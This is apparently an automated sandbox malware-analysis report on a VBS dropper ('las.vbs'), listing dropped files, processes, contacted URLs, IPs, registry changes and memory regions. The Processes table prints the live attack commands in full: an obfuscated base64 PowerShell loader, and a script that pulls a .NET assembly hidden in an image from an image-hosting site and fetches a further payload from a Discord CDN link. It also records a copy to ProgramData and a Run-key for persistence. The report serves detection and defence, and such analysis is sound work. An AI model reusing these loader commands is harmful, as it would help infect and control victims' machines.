Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
las.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF, CR line terminators
|
initial sample
|
||
C:\ProgramData\cognitivo.vbs
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\rXYIP[1].txt
|
ASCII text, with very long lines (12366), with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jcsx1le.0mg.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d30ticws.fno.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1h4ezea.1ds.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaw1jmdp.pdc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mxgq5xv3.yzv.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nmxvjc2k.jb2.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\las.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreZgBmDgTreDUDgTreZDgTreDgTreyDgTreDEDgTreOQBlDgTreDgDgTreZQBiDgTreDDgTreDgTreZgDgTre4DgTreDYDgTreMQDgTrewDgTreDDgTreDgTreZQDgTre5DgTreDDgTreDgTreMwBjDgTreDgDgTreODgTreDgTre3DgTreGEDgTreNQBiDgTreGUDgTreYQDgTrezDgTreGYDgTreZDgTreDgTrexDgTreGEDgTreOQDgTre3DgTreDIDgTreYQDgTre2DgTreDkDgTreNgDgTrexDgTreGIDgTreNgDgTre4DgTreDQDgTreMgDgTrexDgTreDDgTreDgTreOQBkDgTreDgDgTreZQDgTre4DgTreDkDgTreNgDgTre0DgTreDQDgTreMQDgTre5DgTreGIDgTreNDgTreDgTre9DgTreG0DgTreaDgTreDgTremDgTreGEDgTreNgDgTreyDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGEDgTreZQDgTrezDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTrecwB3DgTreG8DgTreZDgTreBuDgTreGkDgTredwDgTrevDgTreDYDgTreNQDgTrewDgTreDEDgTreNDgTreDgTre1DgTreDIDgTreMgDgTrezDgTreDMDgTreMQDgTrexDgTreDEDgTreMgDgTre2DgTreDMDgTreNDgTreDgTreyDgTreDEDgTreLwDgTrezDgTreDQDgTreNgDgTrexDgTreDkDgTreMQDgTrexDgTreDEDgTreNQDgTrezDgTreDIDgTreMDgTreDgTre3DgTreDIDgTreNgDgTre1DgTreDMDgTreMgDgTrexDgTreC8DgTrecwB0DgTreG4DgTreZQBtDgTreGgDgTreYwBhDgTreHQDgTredDgTreBhDgTreC8DgTrebQBvDgTreGMDgTreLgBwDgTreHDgTreDgTreYQBkDgTreHIDgTrebwBjDgTreHMDgTreaQBkDgTreC4DgTrebgBkDgTreGMDgTreLwDgTrevDgTreDoDgTrecwBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBDDgTreDoDgTreXDgTreBQDgTreHIDgTrebwBnDgTreHIDgTreYQBtDgTreEQDgTreYQB0DgTreGEDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYwBvDgTreGcDgTrebgBpDgTreHQDgTreaQB2DgTreG8DgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634',
'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('&ff5d219e8eb0f86100e903c887a5bea3fd1a972a6961b6842109d8e8964419b4=mh&a62d0566=si&ae322566=xe?txt.swodniw/6501452233111263421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth'
, '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs"
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
Name
|
IP
|
Malicious
|
|
---|---|---|---|
https://paste.ee/d/rXYIP
|
188.114.96.3
|
||
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
|
188.114.97.3
|
||
https://paste.ee/
|
unknown
|
||
https://www.google.com
|
unknown
|
||
https://paste.ee/d/rXYIPY
|
unknown
|
||
https://cdn.discordapp.com/attachments/1235627023511191643/1243621113322541056/windows.txt?ex=665223ea&is=6650d26a&hm=4b9144698e8d9012486b1696a279a1df3aeb5a788c309e00168f0be8e912d5ff&
|
162.159.134.233
|
||
https://paste.ee/d/rXYIPm
|
unknown
|
||
https://www.google.com;
|
unknown
|
||
https://paste.ee/d/rXYIPl
|
unknown
|
||
https://analytics.paste.ee;
|
unknown
|
||
https://analytics.paste.ee
|
unknown
|
||
https://cdnjs.cloudflare.com
|
unknown
|
||
https://aka.ms/pscore68
|
unknown
|
||
https://cdnjs.cloudflare.com;
|
unknown
|
||
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
https://secure.gravatar.com
|
unknown
|
||
https://themes.googleusercontent.com
|
unknown
|
There are 7 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
paste.ee
|
188.114.96.3
|
||
uploaddeimagens.com.br
|
188.114.97.3
|
||
cdn.discordapp.com
|
162.159.134.233
|
IPs
IP
|
Domain
|
Country
|
Malicious
|
|
---|---|---|---|---|
188.114.97.3
|
uploaddeimagens.com.br
|
European Union
|
||
188.114.96.3
|
paste.ee
|
European Union
|
||
162.159.134.233
|
cdn.discordapp.com
|
United States
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
225658E5000
|
heap
|
page read and write
|
||
897D67E000
|
stack
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
225651A0000
|
heap
|
page read and write
|
||
2256592E000
|
heap
|
page read and write
|
||
210C12E0000
|
heap
|
page read and write
|
||
210C309C000
|
heap
|
page read and write
|
||
25EAE741000
|
heap
|
page read and write
|
||
25EAE760000
|
heap
|
page read and write
|
||
22564EA7000
|
heap
|
page read and write
|
||
210C12DC000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
225659B0000
|
heap
|
page read and write
|
||
245F2740000
|
trusted library allocation
|
page read and write
|
||
2851DA43000
|
heap
|
page read and write
|
||
25EAE755000
|
heap
|
page read and write
|
||
245F266A000
|
heap
|
page read and write
|
||
897D353000
|
stack
|
page read and write
|
||
210C1448000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
1D402801000
|
trusted library allocation
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
A2C48FE000
|
stack
|
page read and write
|
||
25EAE767000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
2256594B000
|
heap
|
page read and write
|
||
245F2620000
|
heap
|
page read and write
|
||
25EAE7C6000
|
heap
|
page read and write
|
||
25EAE74F000
|
heap
|
page read and write
|
||
28503953000
|
heap
|
page read and write
|
||
25EAC9B2000
|
heap
|
page read and write
|
||
210C3097000
|
heap
|
page read and write
|
||
25EAE784000
|
heap
|
page read and write
|
||
245F4660000
|
heap
|
page execute and read and write
|
||
285058F5000
|
trusted library allocation
|
page read and write
|
||
25EAC9EB000
|
heap
|
page read and write
|
||
28505942000
|
trusted library allocation
|
page read and write
|
||
245804A0000
|
trusted library allocation
|
page read and write
|
||
285061CA000
|
trusted library allocation
|
page read and write
|
||
24590001000
|
trusted library allocation
|
page read and write
|
||
7FFD9B55D000
|
trusted library allocation
|
page execute and read and write
|
||
24580411000
|
trusted library allocation
|
page read and write
|
||
24580459000
|
trusted library allocation
|
page read and write
|
||
DDBF5FD000
|
stack
|
page read and write
|
||
DDBF47E000
|
unkown
|
page read and write
|
||
210C2D24000
|
heap
|
page read and write
|
||
24580596000
|
trusted library allocation
|
page read and write
|
||
210C1445000
|
heap
|
page read and write
|
||
22564E8A000
|
heap
|
page read and write
|
||
210C3142000
|
heap
|
page read and write
|
||
25EAE93D000
|
heap
|
page read and write
|
||
24580001000
|
trusted library allocation
|
page read and write
|
||
25EAE75B000
|
heap
|
page read and write
|
||
245F26E7000
|
heap
|
page read and write
|
||
F96BAFE000
|
stack
|
page read and write
|
||
22563185000
|
heap
|
page read and write
|
||
2256316F000
|
heap
|
page read and write
|
||
210C2D20000
|
heap
|
page read and write
|
||
210C12D3000
|
heap
|
page read and write
|
||
225659BE000
|
heap
|
page read and write
|
||
25EAC9E3000
|
heap
|
page read and write
|
||
210C12A0000
|
heap
|
page read and write
|
||
245F2674000
|
heap
|
page read and write
|
||
285038D0000
|
heap
|
page read and write
|
||
22565BCF000
|
heap
|
page read and write
|
||
25EAE840000
|
heap
|
page read and write
|
||
210C3076000
|
heap
|
page read and write
|
||
210C3084000
|
heap
|
page read and write
|
||
245F26B7000
|
heap
|
page read and write
|
||
25EAE760000
|
heap
|
page read and write
|
||
245F44A9000
|
heap
|
page read and write
|
||
25EAE772000
|
heap
|
page read and write
|
||
210C326D000
|
heap
|
page read and write
|
||
210C326E000
|
heap
|
page read and write
|
||
22564F2B000
|
heap
|
page read and write
|
||
7FFD9B710000
|
trusted library allocation
|
page execute and read and write
|
||
25EAC930000
|
heap
|
page read and write
|
||
7FFD9B560000
|
trusted library allocation
|
page read and write
|
||
25EAC9DE000
|
heap
|
page read and write
|
||
225659D0000
|
heap
|
page read and write
|
||
225658E5000
|
heap
|
page read and write
|
||
22564EF3000
|
heap
|
page read and write
|
||
225658E3000
|
heap
|
page read and write
|
||
22565BCE000
|
heap
|
page read and write
|
||
245F4503000
|
heap
|
page read and write
|
||
25EAE81F000
|
heap
|
page read and write
|
||
210C3090000
|
heap
|
page read and write
|
||
22562FF0000
|
heap
|
page read and write
|
||
7FFD9B6F0000
|
trusted library allocation
|
page read and write
|
||
25EAE740000
|
heap
|
page read and write
|
||
F96B6FE000
|
stack
|
page read and write
|
||
897DDBB000
|
stack
|
page read and write
|
||
225658ED000
|
heap
|
page read and write
|
||
7FFD9B554000
|
trusted library allocation
|
page read and write
|
||
DDBF93C000
|
stack
|
page read and write
|
||
210C3115000
|
heap
|
page read and write
|
||
1D403201000
|
trusted library allocation
|
page read and write
|
||
245F268A000
|
heap
|
page read and write
|
||
210C30D1000
|
heap
|
page read and write
|
||
2851DC90000
|
heap
|
page read and write
|
||
24580134000
|
trusted library allocation
|
page read and write
|
||
225658EE000
|
heap
|
page read and write
|
||
28503B50000
|
heap
|
page readonly
|
||
285059E4000
|
trusted library allocation
|
page read and write
|
||
210C1200000
|
heap
|
page read and write
|
||
7FFD9B606000
|
trusted library allocation
|
page read and write
|
||
25EAC9EB000
|
heap
|
page read and write
|
||
25EAE815000
|
heap
|
page read and write
|
||
225658E0000
|
heap
|
page read and write
|
||
25EAC9DB000
|
heap
|
page read and write
|
||
210C12C9000
|
heap
|
page read and write
|
||
210C3090000
|
heap
|
page read and write
|
||
28503981000
|
heap
|
page read and write
|
||
210C12D0000
|
heap
|
page read and write
|
||
F96B77E000
|
stack
|
page read and write
|
||
22564E9A000
|
heap
|
page read and write
|
||
245F4692000
|
heap
|
page read and write
|
||
225659C7000
|
heap
|
page read and write
|
||
7FFD9B610000
|
trusted library allocation
|
page execute and read and write
|
||
897D8FD000
|
stack
|
page read and write
|
||
25EAC9E5000
|
heap
|
